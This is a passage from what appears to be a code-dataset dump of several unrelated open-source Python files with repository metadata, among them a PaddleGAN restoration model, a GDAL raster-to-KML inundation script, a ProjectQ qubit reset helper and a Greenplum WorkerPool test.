    def test_image_size(self, input_size, effective_image_size, category="shapes", path=""):
        """Batches produced by the datamodule match the configured image size."""
        config = get_configurable_parameters("stfpm")
        config.dataset.path = path
        config.dataset.category = category
        config.dataset.image_size = input_size
        config = update_input_size_config(config)

        datamodule = get_datamodule(config)
        datamodule.setup()

        first_batch = next(iter(datamodule.train_dataloader()))
        assert first_batch["image"].shape[-2:] == effective_image_size
| true | true |
1c2c7cb28a9c66943438e1a885f3e8d0f3eca3a9 | 2,870 | py | Python | ppgan/models/mpr_model.py | windstamp/PaddleGAN | 4d9609d0ab9cf1058f564e354dfbc29c0ac3108a | [
"Apache-2.0"
] | 6,852 | 2020-06-18T10:56:27.000Z | 2022-03-31T10:17:47.000Z | ppgan/models/mpr_model.py | HighCWu/PaddleGAN | 32132fa9aa288fbf0325105088b878adfaf16d75 | [
"Apache-2.0"
] | 283 | 2020-07-09T13:29:58.000Z | 2022-03-23T02:50:25.000Z | ppgan/models/mpr_model.py | HighCWu/PaddleGAN | 32132fa9aa288fbf0325105088b878adfaf16d75 | [
"Apache-2.0"
] | 973 | 2020-06-18T11:15:35.000Z | 2022-03-30T10:50:16.000Z | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import paddle.nn as nn
from .builder import MODELS
from .base_model import BaseModel
from .generators.builder import build_generator
from .criterions.builder import build_criterion
from ..modules.init import reset_parameters, init_weights
@MODELS.register()
class MPRModel(BaseModel):
    """MPR Model.

    Paper: MPR: Multi-Stage Progressive Image Restoration (CVPR 2021).
    https://arxiv.org/abs/2102.02808
    """
    def __init__(self, generator, char_criterion=None, edge_criterion=None):
        """Initialize the MPR class.

        Args:
            generator (dict): config of generator.
            char_criterion (dict): config of char criterion.
            edge_criterion (dict): config of edge criterion.
        """
        super(MPRModel, self).__init__(generator)
        self.current_iter = 1

        self.nets['generator'] = build_generator(generator)
        init_weights(self.nets['generator'])

        # Both criteria are optional at construction time, but train_iter
        # uses both -- training configs are expected to provide them.
        if char_criterion:
            self.char_criterion = build_criterion(char_criterion)
        if edge_criterion:
            self.edge_criterion = build_criterion(edge_criterion)

    def setup_input(self, input):
        # input is a (target, degraded) pair of batches.
        self.target = input[0]
        self.input_ = input[1]

    def train_iter(self, optims=None):
        """Run one optimization step.

        The generator returns one restored image per stage; the total loss
        is the sum over stages of the char loss plus 0.05 * the edge loss.

        Args:
            optims (dict): optimizers, keyed by 'optim'.
        """
        optims['optim'].clear_gradients()
        restored = self.nets['generator'](self.input_)

        # Accumulate per-stage losses (direct iteration instead of the
        # original range(len(...)) indexing).
        loss_char = []
        loss_edge = []
        for stage_output in restored:
            loss_char.append(self.char_criterion(stage_output, self.target))
            loss_edge.append(self.edge_criterion(stage_output, self.target))

        loss_char = paddle.sum(paddle.stack(loss_char))
        loss_edge = paddle.sum(paddle.stack(loss_edge))

        loss = loss_char + 0.05 * loss_edge

        loss.backward()
        optims['optim'].step()
        self.losses['loss'] = loss.numpy()

    def forward(self):
        """Run forward pass; called by both functions <train_iter> and <test_iter>."""
        pass
# NOTE(review): the name says "edvr" but this lives in the MPR model
# module -- presumably carried over from the EDVR model; confirm intent.
def init_edvr_weight(net):
    # Re-initialize every layer of `net` that has a `weight` attribute,
    # skipping batch-norm layers (their running stats/affine params are
    # left untouched).
    def reset_func(m):
        if hasattr(m, 'weight') and (not isinstance(
                m, (nn.BatchNorm, nn.BatchNorm2D))):
            reset_parameters(m)

    net.apply(reset_func)
| 32.247191 | 86 | 0.668641 |
import paddle
import paddle.nn as nn
from .builder import MODELS
from .base_model import BaseModel
from .generators.builder import build_generator
from .criterions.builder import build_criterion
from ..modules.init import reset_parameters, init_weights
@MODELS.register()
class MPRModel(BaseModel):
def __init__(self, generator, char_criterion=None, edge_criterion=None):
super(MPRModel, self).__init__(generator)
self.current_iter = 1
self.nets['generator'] = build_generator(generator)
init_weights(self.nets['generator'])
if char_criterion:
self.char_criterion = build_criterion(char_criterion)
if edge_criterion:
self.edge_criterion = build_criterion(edge_criterion)
def setup_input(self, input):
self.target = input[0]
self.input_ = input[1]
def train_iter(self, optims=None):
optims['optim'].clear_gradients()
restored = self.nets['generator'](self.input_)
loss_char = []
loss_edge = []
for i in range(len(restored)):
loss_char.append(self.char_criterion(restored[i], self.target))
loss_edge.append(self.edge_criterion(restored[i], self.target))
loss_char = paddle.stack(loss_char)
loss_edge = paddle.stack(loss_edge)
loss_char = paddle.sum(loss_char)
loss_edge = paddle.sum(loss_edge)
loss = (loss_char) + (0.05 * loss_edge)
loss.backward()
optims['optim'].step()
self.losses['loss'] = loss.numpy()
def forward(self):
pass
def init_edvr_weight(net):
def reset_func(m):
if hasattr(m, 'weight') and (not isinstance(
m, (nn.BatchNorm, nn.BatchNorm2D))):
reset_parameters(m)
net.apply(reset_func)
| true | true |
1c2c7cc33c3845044ace8661de804165d0fbb5df | 9,169 | py | Python | inun4d_kml.py | larryyin/barrier_interp | 0836a1678117bba687e60fe0eb18fd29cae52a9f | [
"Unlicense"
] | 2 | 2017-09-21T06:00:43.000Z | 2020-03-19T03:58:41.000Z | inun4d_kml.py | larryyin/barrier_interp | 0836a1678117bba687e60fe0eb18fd29cae52a9f | [
"Unlicense"
] | null | null | null | inun4d_kml.py | larryyin/barrier_interp | 0836a1678117bba687e60fe0eb18fd29cae52a9f | [
"Unlicense"
] | null | null | null | #%%
import time
start = time.time()
#import gdal, ogr, osr
from osgeo import gdal
from osgeo import ogr
from osgeo import osr
from osgeo.gdalnumeric import *
from osgeo.gdalconst import *
#import numpy as np
#import scipy.ndimage as ndimage
#import pandas as pd
from subprocess import call
from itertools import compress
#import skfmm
#import stateplane
#import pylab as p
#%matplotlib inline
# Input: boolean inundation raster (depth classes as pixel values).
file_bool2 = '../inun_nj/inun_bool2.tif'
# Intermediate: GML polygon features produced by gdal_polygonize.
file_poly2 = '../inun_nj/inun_poly2'
# Output: final KML water-level overlay.
file_wl = '../inun_nj/wl.kml'
#%%
# Vectorize band 1 of the raster into GML polygons (one feature per
# contiguous region, DN attribute = depth class).
call(['gdal_polygonize.py', '-nomask', file_bool2, '-b', '1', '-q', file_poly2])
#%% Polygon of wl
print('Constructing inundation polygons...')
# Read the whole GML file as one line so the tag-based string slicing
# below works regardless of how gdal_polygonize wrapped its output.
with open(file_poly2,'r') as f_poly:
    text_all = f_poly.read().replace('\n', '')
# DN (depth class) attribute of each polygon feature, in file order.
dn = []
for item in text_all.split("</ogr:DN>"):
    if "<ogr:DN>" in item:
        dn.append(item [ item.find("<ogr:DN>")+len("<ogr:DN>") : ])
dn = [int(v) for v in dn[:]]
# Outer boundary of each polygon: the text between the opening and
# closing outerBoundaryIs/LinearRing/coordinates tags.
outer_block = []
for item in text_all.split("</gml:coordinates></gml:LinearRing></gml:outerBoundaryIs>"):
    if "<gml:outerBoundaryIs><gml:LinearRing><gml:coordinates>" in item:
        outer_block.append(item [ item.find("<gml:outerBoundaryIs><gml:LinearRing><gml:coordinates>")+
                              len("<gml:outerBoundaryIs><gml:LinearRing><gml:coordinates>") : ])
# Parse "lon,lat lon,lat ..." strings into [[lon, lat], ...] float rings.
outer = [[[float(v6) for v6 in v5] for v5 in v4] for v4 in
          [[v3.split(',') for v3 in v2] for v2 in
           [v.split(' ') for v in outer_block]]]
# One featureMember per polygon; needed to associate inner rings (holes)
# with the feature they belong to.
fm = []
for item in text_all.split("</gml:featureMember>"):
    if "<gml:featureMember>" in item:
        fm.append(item [ item.find("<gml:featureMember>")+len("<gml:featureMember>") : ])
# Inner rings (holes) per feature, and how many each feature has.
inner = []
inner_count = []
for i in range(len(fm)):
    inner_block = []
    for item in fm[i].split("</gml:coordinates></gml:LinearRing></gml:innerBoundaryIs>"):
        if "<gml:innerBoundaryIs><gml:LinearRing><gml:coordinates>" in item:
            inner_block.append(item [ item.find("<gml:innerBoundaryIs><gml:LinearRing><gml:coordinates>")+
                              len("<gml:innerBoundaryIs><gml:LinearRing><gml:coordinates>") : ])
    if not inner_block:
        # Feature has no holes.
        inner.append([])
        inner_count.append(0)
    else:
        inner.append([[[float(v6) for v6 in v5] for v5 in v4] for v4 in
                  [[v3.split(',') for v3 in v2] for v2 in
                   [v.split(' ') for v in inner_block]]])
        inner_count.append(len(inner[-1]))
# Split the polygons into per-depth-class lists (DN values 1..5).
# BUG FIX: the original computed the DN==3 selection twice (an exact
# duplicate block); the duplicate has been removed -- it produced
# identical results.
def _select_class(dn_value):
    """Return (outer rings, inner rings, inner counts) of polygons with DN == dn_value."""
    mask = [v == dn_value for v in dn]
    return (list(compress(outer, mask)),
            list(compress(inner, mask)),
            list(compress(inner_count, mask)))

outer1, inner1, inner_count1 = _select_class(1)
outer2, inner2, inner_count2 = _select_class(2)
outer3, inner3, inner_count3 = _select_class(3)
outer4, inner4, inner_count4 = _select_class(4)
outer5, inner5, inner_count5 = _select_class(5)
# KML colors are aabbggrr hex strings.
c_empty = '00000000'  # fully transparent (polygon outlines)
c_1 = 'AB00FF00'      # depth class 1
c_2 = 'AB00FFFF'      # depth class 2
c_3 = 'AB0080FF'      # depth class 3
c_4 = 'AB0000FF'      # depth class 4
c_5 = 'ABCC00CC'      # depth class 5
# BUG FIX: the original referenced an undefined name `title_str` below
# (NameError at runtime) and also had a dead `s = []` assignment that was
# immediately overwritten. Provide a document title here.
title_str = 'Inundation water level'
s = """<?xml version="1.0" encoding="UTF-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2">
    <Document>
    <name>{title}</name>""".format(title=title_str)
# One shared <Style> per depth class (the five original copies differed
# only in the id and the fill color).
for _sid, _fill in (('s_1', c_1), ('s_2', c_2), ('s_3', c_3),
                    ('s_4', c_4), ('s_5', c_5)):
    s += """
    <Style id="{sid}">
        <LineStyle>
            <color>{c0}</color>
            <width>0</width>
        </LineStyle>
        <PolyStyle>
            <color>{c}</color>
        </PolyStyle>
    </Style>""".format(sid=_sid, c=_fill, c0=c_empty)
# The five original per-class loops were byte-for-byte identical except
# for the style id and the source lists; they are factored into helpers.
# The emitted KML text is unchanged.
def _coordinates(ring):
    """Render one linear ring as newline-separated "lon,lat" KML coordinate lines."""
    return "".join(
        "\n                        {lon:.15f},{lat:.15f}".format(lon=pt[0], lat=pt[1])
        for pt in ring)


def _placemark(style_id, idx, outer_ring, inner_rings):
    """Render one KML <Placemark> polygon (outer boundary plus optional holes)."""
    parts = ["""
    <Placemark>
        <name>{id:d}</name>
        <visibility>1</visibility>
        <styleUrl>#{sid}</styleUrl>
        <Polygon>
            <extrude>0</extrude>
            <tessellate>1</tessellate>
            <altitudeMode>clampToGround</altitudeMode>
            <outerBoundaryIs>
                <LinearRing>
                    <coordinates>""".format(id=idx, sid=style_id)]
    parts.append(_coordinates(outer_ring))
    parts.append("""
                    </coordinates>
                </LinearRing>
            </outerBoundaryIs>""")
    for ring in inner_rings:
        parts.append("""
            <innerBoundaryIs>
                <LinearRing>
                    <coordinates>""")
        parts.append(_coordinates(ring))
        parts.append("""
                    </coordinates>
                </LinearRing>
            </innerBoundaryIs>""")
    parts.append("""
        </Polygon>
    </Placemark>""")
    return "".join(parts)


# Emit every polygon of every depth class, in class order (1..5).
for _sid, _outers, _inners, _counts in (
        ('s_1', outer1, inner1, inner_count1),
        ('s_2', outer2, inner2, inner_count2),
        ('s_3', outer3, inner3, inner_count3),
        ('s_4', outer4, inner4, inner_count4),
        ('s_5', outer5, inner5, inner_count5)):
    for _i in range(len(_outers)):
        _holes = _inners[_i] if _counts[_i] > 0 else []
        s += _placemark(_sid, _i, _outers[_i], _holes)
s += """
</Document>
</kml>"""
with open(file_wl,'w') as f_kml:
f_kml.writelines(s)
#%%
end = time.time()
print(end - start)
| 22.97995 | 106 | 0.599629 |
import time
start = time.time()
from osgeo import gdal
from osgeo import ogr
from osgeo import osr
from osgeo.gdalnumeric import *
from osgeo.gdalconst import *
from subprocess import call
from itertools import compress
file_bool2 = '../inun_nj/inun_bool2.tif'
file_poly2 = '../inun_nj/inun_poly2'
file_wl = '../inun_nj/wl.kml'
call(['gdal_polygonize.py', '-nomask', file_bool2, '-b', '1', '-q', file_poly2])
print('Constructing inundation polygons...')
with open(file_poly2,'r') as f_poly:
text_all = f_poly.read().replace('\n', '')
dn = []
for item in text_all.split("</ogr:DN>"):
if "<ogr:DN>" in item:
dn.append(item [ item.find("<ogr:DN>")+len("<ogr:DN>") : ])
dn = [int(v) for v in dn[:]]
outer_block = []
for item in text_all.split("</gml:coordinates></gml:LinearRing></gml:outerBoundaryIs>"):
if "<gml:outerBoundaryIs><gml:LinearRing><gml:coordinates>" in item:
outer_block.append(item [ item.find("<gml:outerBoundaryIs><gml:LinearRing><gml:coordinates>")+
len("<gml:outerBoundaryIs><gml:LinearRing><gml:coordinates>") : ])
outer = [[[float(v6) for v6 in v5] for v5 in v4] for v4 in
[[v3.split(',') for v3 in v2] for v2 in
[v.split(' ') for v in outer_block]]]
fm = []
for item in text_all.split("</gml:featureMember>"):
if "<gml:featureMember>" in item:
fm.append(item [ item.find("<gml:featureMember>")+len("<gml:featureMember>") : ])
inner = []
inner_count = []
for i in range(len(fm)):
inner_block = []
for item in fm[i].split("</gml:coordinates></gml:LinearRing></gml:innerBoundaryIs>"):
if "<gml:innerBoundaryIs><gml:LinearRing><gml:coordinates>" in item:
inner_block.append(item [ item.find("<gml:innerBoundaryIs><gml:LinearRing><gml:coordinates>")+
len("<gml:innerBoundaryIs><gml:LinearRing><gml:coordinates>") : ])
if not inner_block:
inner.append([])
inner_count.append(0)
else:
inner.append([[[float(v6) for v6 in v5] for v5 in v4] for v4 in
[[v3.split(',') for v3 in v2] for v2 in
[v.split(' ') for v in inner_block]]])
inner_count.append(len(inner[-1]))
dn1 = [v==1 for v in dn]
outer1 = list(compress(outer, dn1))
inner1 = list(compress(inner, dn1))
inner_count1 = list(compress(inner_count, dn1))
dn2 = [v==2 for v in dn]
outer2 = list(compress(outer, dn2))
inner2 = list(compress(inner, dn2))
inner_count2 = list(compress(inner_count, dn2))
dn3 = [v==3 for v in dn]
outer3 = list(compress(outer, dn3))
inner3 = list(compress(inner, dn3))
inner_count3 = list(compress(inner_count, dn3))
dn3 = [v==3 for v in dn]
outer3 = list(compress(outer, dn3))
inner3 = list(compress(inner, dn3))
inner_count3 = list(compress(inner_count, dn3))
dn4 = [v==4 for v in dn]
outer4 = list(compress(outer, dn4))
inner4 = list(compress(inner, dn4))
inner_count4 = list(compress(inner_count, dn4))
dn5 = [v==5 for v in dn]
outer5 = list(compress(outer, dn5))
inner5 = list(compress(inner, dn5))
inner_count5 = list(compress(inner_count, dn5))
c_empty = '00000000'
c_1 = 'AB00FF00'
c_2 = 'AB00FFFF'
c_3 = 'AB0080FF'
c_4 = 'AB0000FF'
c_5 = 'ABCC00CC'
s = []
s = """<?xml version="1.0" encoding="UTF-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2">
<Document>
<name>{title}</name>""".format(title=title_str)
s += """
<Style id="s_1">
<LineStyle>
<color>{c0}</color>
<width>0</width>
</LineStyle>
<PolyStyle>
<color>{c}</color>
</PolyStyle>
</Style>""".format(c=c_1,c0=c_empty)
s += """
<Style id="s_2">
<LineStyle>
<color>{c0}</color>
<width>0</width>
</LineStyle>
<PolyStyle>
<color>{c}</color>
</PolyStyle>
</Style>""".format(c=c_2,c0=c_empty)
s += """
<Style id="s_3">
<LineStyle>
<color>{c0}</color>
<width>0</width>
</LineStyle>
<PolyStyle>
<color>{c}</color>
</PolyStyle>
</Style>""".format(c=c_3,c0=c_empty)
s += """
<Style id="s_4">
<LineStyle>
<color>{c0}</color>
<width>0</width>
</LineStyle>
<PolyStyle>
<color>{c}</color>
</PolyStyle>
</Style>""".format(c=c_4,c0=c_empty)
s += """
<Style id="s_5">
<LineStyle>
<color>{c0}</color>
<width>0</width>
</LineStyle>
<PolyStyle>
<color>{c}</color>
</PolyStyle>
</Style>""".format(c=c_5,c0=c_empty)
for i in range(len(outer1)):
s += """
<Placemark>
<name>{id:d}</name>
<visibility>1</visibility>
<styleUrl>#s_1</styleUrl>
<Polygon>
<extrude>0</extrude>
<tessellate>1</tessellate>
<altitudeMode>clampToGround</altitudeMode>
<outerBoundaryIs>
<LinearRing>
<coordinates>""".format(id=i)
for ii in range(len(outer1[i])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=outer1[i][ii][0],lat=outer1[i][ii][1])
s += """
</coordinates>
</LinearRing>
</outerBoundaryIs>"""
if inner_count1[i]>0:
for ii in range(inner_count1[i]):
s += """
<innerBoundaryIs>
<LinearRing>
<coordinates>"""
for iii in range(len(inner1[i][ii])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=inner1[i][ii][iii][0],lat=inner1[i][ii][iii][1])
s += """
</coordinates>
</LinearRing>
</innerBoundaryIs>"""
s += """
</Polygon>
</Placemark>"""
for i in range(len(outer2)):
s += """
<Placemark>
<name>{id:d}</name>
<visibility>1</visibility>
<styleUrl>#s_2</styleUrl>
<Polygon>
<extrude>0</extrude>
<tessellate>1</tessellate>
<altitudeMode>clampToGround</altitudeMode>
<outerBoundaryIs>
<LinearRing>
<coordinates>""".format(id=i)
for ii in range(len(outer2[i])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=outer2[i][ii][0],lat=outer2[i][ii][1])
s += """
</coordinates>
</LinearRing>
</outerBoundaryIs>"""
if inner_count2[i]>0:
for ii in range(inner_count2[i]):
s += """
<innerBoundaryIs>
<LinearRing>
<coordinates>"""
for iii in range(len(inner2[i][ii])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=inner2[i][ii][iii][0],lat=inner2[i][ii][iii][1])
s += """
</coordinates>
</LinearRing>
</innerBoundaryIs>"""
s += """
</Polygon>
</Placemark>"""
for i in range(len(outer3)):
s += """
<Placemark>
<name>{id:d}</name>
<visibility>1</visibility>
<styleUrl>#s_3</styleUrl>
<Polygon>
<extrude>0</extrude>
<tessellate>1</tessellate>
<altitudeMode>clampToGround</altitudeMode>
<outerBoundaryIs>
<LinearRing>
<coordinates>""".format(id=i)
for ii in range(len(outer3[i])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=outer3[i][ii][0],lat=outer3[i][ii][1])
s += """
</coordinates>
</LinearRing>
</outerBoundaryIs>"""
if inner_count3[i]>0:
for ii in range(inner_count3[i]):
s += """
<innerBoundaryIs>
<LinearRing>
<coordinates>"""
for iii in range(len(inner3[i][ii])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=inner3[i][ii][iii][0],lat=inner3[i][ii][iii][1])
s += """
</coordinates>
</LinearRing>
</innerBoundaryIs>"""
s += """
</Polygon>
</Placemark>"""
for i in range(len(outer4)):
s += """
<Placemark>
<name>{id:d}</name>
<visibility>1</visibility>
<styleUrl>#s_4</styleUrl>
<Polygon>
<extrude>0</extrude>
<tessellate>1</tessellate>
<altitudeMode>clampToGround</altitudeMode>
<outerBoundaryIs>
<LinearRing>
<coordinates>""".format(id=i)
for ii in range(len(outer4[i])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=outer4[i][ii][0],lat=outer4[i][ii][1])
s += """
</coordinates>
</LinearRing>
</outerBoundaryIs>"""
if inner_count4[i]>0:
for ii in range(inner_count4[i]):
s += """
<innerBoundaryIs>
<LinearRing>
<coordinates>"""
for iii in range(len(inner4[i][ii])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=inner4[i][ii][iii][0],lat=inner4[i][ii][iii][1])
s += """
</coordinates>
</LinearRing>
</innerBoundaryIs>"""
s += """
</Polygon>
</Placemark>"""
for i in range(len(outer5)):
s += """
<Placemark>
<name>{id:d}</name>
<visibility>1</visibility>
<styleUrl>#s_5</styleUrl>
<Polygon>
<extrude>0</extrude>
<tessellate>1</tessellate>
<altitudeMode>clampToGround</altitudeMode>
<outerBoundaryIs>
<LinearRing>
<coordinates>""".format(id=i)
for ii in range(len(outer5[i])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=outer5[i][ii][0],lat=outer5[i][ii][1])
s += """
</coordinates>
</LinearRing>
</outerBoundaryIs>"""
if inner_count5[i]>0:
for ii in range(inner_count5[i]):
s += """
<innerBoundaryIs>
<LinearRing>
<coordinates>"""
for iii in range(len(inner5[i][ii])):
s += """
{lon:.15f},{lat:.15f}""".format(lon=inner5[i][ii][iii][0],lat=inner5[i][ii][iii][1])
s += """
</coordinates>
</LinearRing>
</innerBoundaryIs>"""
s += """
</Polygon>
</Placemark>"""
s += """
</Document>
</kml>"""
with open(file_wl,'w') as f_kml:
f_kml.writelines(s)
end = time.time()
print(end - start)
| true | true |
1c2c7cf6d2836cb75f5b39d865a3c9ab7bf4e33d | 1,024 | py | Python | ProjectQ/utility.py | jclapis/qsfe | 941488f8f8a81a4b7d7fe28414ce14fa478a692a | [
"Apache-2.0"
] | 11 | 2019-06-02T01:47:24.000Z | 2021-08-10T14:54:35.000Z | ProjectQ/utility.py | jclapis/qsfe | 941488f8f8a81a4b7d7fe28414ce14fa478a692a | [
"Apache-2.0"
] | null | null | null | ProjectQ/utility.py | jclapis/qsfe | 941488f8f8a81a4b7d7fe28414ce14fa478a692a | [
"Apache-2.0"
] | 2 | 2020-04-19T17:39:23.000Z | 2021-03-08T12:35:55.000Z | # ========================================================================
# Copyright (C) 2019 The MITRE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ========================================================================
from projectq.ops import *
def reset(qubits):
    """
    Resets all of the given qubits to the |0> state.

    Each qubit is measured (collapsing it to |0> or |1>); qubits that
    collapsed to |1> are flipped back with an X gate.

    Parameters:
        qubits (Qureg): The qubits to reset.
    """
    for qubit in qubits:
        Measure | qubit
        # int(qubit) reads the measurement outcome (idiomatic: no
        # C-style parentheses around the condition).
        if int(qubit) == 1:
            X | qubit
from projectq.ops import *
def reset(qubits):
for qubit in qubits:
Measure | qubit
if(int(qubit) == 1):
X | qubit | true | true |
1c2c7da22660d395318a62ddab8dbfdcc1d920e1 | 505 | py | Python | parallel/__init__.py | sjwarner-bp/pyparallel | c79718e4fe700286dd27cfe5f756f9b37dcf48e8 | [
"BSD-3-Clause"
] | 36 | 2015-12-12T22:31:35.000Z | 2022-02-15T08:49:51.000Z | parallel/__init__.py | sjwarner-bp/pyparallel | c79718e4fe700286dd27cfe5f756f9b37dcf48e8 | [
"BSD-3-Clause"
] | 12 | 2016-01-05T09:14:26.000Z | 2022-03-11T12:56:53.000Z | parallel/__init__.py | sjwarner-bp/pyparallel | c79718e4fe700286dd27cfe5f756f9b37dcf48e8 | [
"BSD-3-Clause"
] | 23 | 2015-10-30T15:50:21.000Z | 2022-01-05T04:54:20.000Z | # portable parallel port access with python
# this is a wrapper module for different platform implementations
#
# (C)2001-2002 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import os
VERSION = "0.3"
# choose an implementation, depending on os
if os.name == 'nt':
from parallel.parallelwin32 import Parallel # noqa
elif os.name == 'posix':
from parallel.parallelppdev import Parallel # noqa
else:
raise "Sorry no implementation for your platform available."
| 28.055556 | 65 | 0.740594 |
import os
VERSION = "0.3"
if os.name == 'nt':
from parallel.parallelwin32 import Parallel
elif os.name == 'posix':
from parallel.parallelppdev import Parallel
else:
raise "Sorry no implementation for your platform available."
| true | true |
1c2c800b2a7bc83cb88245c0b951b01438ce7102 | 157 | py | Python | framework/QSSF Service/policies/__init__.py | S-Lab-System-Group/HeliosArtifact | ba73838935bd345ea8575b7bcfcc99e5df690c01 | [
"MIT"
] | 5 | 2021-09-20T13:59:55.000Z | 2022-03-16T12:48:08.000Z | framework/QSSF Service/policies/__init__.py | S-Lab-System-Group/HeliosArtifact | ba73838935bd345ea8575b7bcfcc99e5df690c01 | [
"MIT"
] | null | null | null | framework/QSSF Service/policies/__init__.py | S-Lab-System-Group/HeliosArtifact | ba73838935bd345ea8575b7bcfcc99e5df690c01 | [
"MIT"
] | 1 | 2021-10-15T11:39:11.000Z | 2021-10-15T11:39:11.000Z | from .sjf import ShortestJobFirst
from .srtf import ShortestRemainingTimeFirst
from .fifo import FirstInFirstOut
from .qssf import QuasiShortestServiceFirst
| 31.4 | 44 | 0.872611 | from .sjf import ShortestJobFirst
from .srtf import ShortestRemainingTimeFirst
from .fifo import FirstInFirstOut
from .qssf import QuasiShortestServiceFirst
| true | true |
1c2c8181115351ad978174b2d39e3db8876a4800 | 961 | py | Python | gpMgmt/bin/gppylib/commands/test/unit/test_unit_base.py | nurikk/gpdb | 04fe0202c59721826d1eda2b19d73e5572893fcb | [
"PostgreSQL",
"Apache-2.0"
] | 3 | 2017-12-10T16:41:21.000Z | 2020-07-08T12:59:12.000Z | gpMgmt/bin/gppylib/commands/test/unit/test_unit_base.py | nurikk/gpdb | 04fe0202c59721826d1eda2b19d73e5572893fcb | [
"PostgreSQL",
"Apache-2.0"
] | null | null | null | gpMgmt/bin/gppylib/commands/test/unit/test_unit_base.py | nurikk/gpdb | 04fe0202c59721826d1eda2b19d73e5572893fcb | [
"PostgreSQL",
"Apache-2.0"
] | 4 | 2017-12-10T16:41:35.000Z | 2020-11-28T12:20:30.000Z | #!/usr/bin/env python
#
# Copyright (c) Greenplum Inc 2012. All Rights Reserved.
#
import os
import shutil
import sys
import unittest2 as unittest
from gppylib.commands.base import Command, CommandResult, WorkerPool
from mock import patch, MagicMock, Mock
class WorkerPoolTestCase(unittest.TestCase):
    """Unit tests for WorkerPool.print_progress logging."""
    @patch('gppylib.commands.base.gplog.get_default_logger')
    def test_print_progress(self, mock1):
        """With all queued jobs done, progress should be reported as 100%."""
        w = WorkerPool(numWorkers=32)
        c1 = Command('dummy command1', '')
        c2 = Command('dummy command2', '')
        w.addCommand(c1)
        w.addCommand(c2)
        w.join()
        w.print_progress(2)
        # NOTE(review): unittest.mock auto-creates `called_with` as a child
        # mock attribute, so this call returns a (truthy) Mock and the
        # assertion can never fail -- it verifies nothing. The intended
        # check was presumably
        # mock1.return_value.info.assert_any_call(...); confirm the exact
        # message WorkerPool logs before fixing.
        self.assertTrue(mock1.called_with('100.00% of jobs completed'))
    @patch('gppylib.commands.base.gplog.get_default_logger')
    def test_print_progress_none(self, mock1):
        """print_progress(0) should report 0.00% (no division-by-zero)."""
        w = WorkerPool(numWorkers=32)
        w.print_progress(0)
        w.join()
        # NOTE(review): same always-true assertion as above.
        self.assertTrue(mock1.called_with('0.00% of jobs completed'))
| 30.03125 | 71 | 0.685744 |
import os
import shutil
import sys
import unittest2 as unittest
from gppylib.commands.base import Command, CommandResult, WorkerPool
from mock import patch, MagicMock, Mock
class WorkerPoolTestCase(unittest.TestCase):
@patch('gppylib.commands.base.gplog.get_default_logger')
def test_print_progress(self, mock1):
w = WorkerPool(numWorkers=32)
c1 = Command('dummy command1', '')
c2 = Command('dummy command2', '')
w.addCommand(c1)
w.addCommand(c2)
w.join()
w.print_progress(2)
self.assertTrue(mock1.called_with('100.00% of jobs completed'))
@patch('gppylib.commands.base.gplog.get_default_logger')
def test_print_progress_none(self, mock1):
w = WorkerPool(numWorkers=32)
w.print_progress(0)
w.join()
self.assertTrue(mock1.called_with('0.00% of jobs completed'))
| true | true |
1c2c81b6d8dfa3b62cc323911a7c35d38a860cad | 1,642 | py | Python | s3backgrounddelete/s3backgrounddelete/cortx_s3_signal.py | shailesh-vaidya/cortx-s3server-1 | f61d4ab8961f53722feb68f233840326715ca47e | [
"Apache-2.0"
] | 35 | 2020-09-25T07:27:10.000Z | 2022-03-23T07:49:57.000Z | s3backgrounddelete/s3backgrounddelete/cortx_s3_signal.py | shailesh-vaidya/cortx-s3server-1 | f61d4ab8961f53722feb68f233840326715ca47e | [
"Apache-2.0"
] | 1,000 | 2020-09-24T13:10:23.000Z | 2022-03-28T08:19:34.000Z | s3backgrounddelete/s3backgrounddelete/cortx_s3_signal.py | shailesh-vaidya/cortx-s3server-1 | f61d4ab8961f53722feb68f233840326715ca47e | [
"Apache-2.0"
] | 150 | 2020-09-24T14:41:40.000Z | 2022-03-04T05:37:17.000Z | #
# Copyright (c) 2020 Seagate Technology LLC and/or its Affiliates
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For any questions about this software or licensing,
# please email opensource@seagate.com or cortx-questions@seagate.com.
#
"""
This class implements the signal handler that is used for
dynamically changing config parameters
"""
#!/usr/bin/python3.6
import os
import traceback
import logging
import datetime
import signal
from logging import handlers
from functools import partial
from s3backgrounddelete.cortx_s3_config import CORTXS3Config
class DynamicConfigHandler(object):
    """Installs a SIGHUP handler that reloads config parameters at runtime."""

    def __init__(self, objectx):
        """Register the SIGHUP handler on behalf of the given service object."""
        signal.signal(
            signal.SIGHUP,
            partial(self.sighup_handler_callback, objectx))

    def sighup_handler_callback(self, sighupArg, signum, frame):
        """Re-read the configuration and apply the (possibly new) log level."""
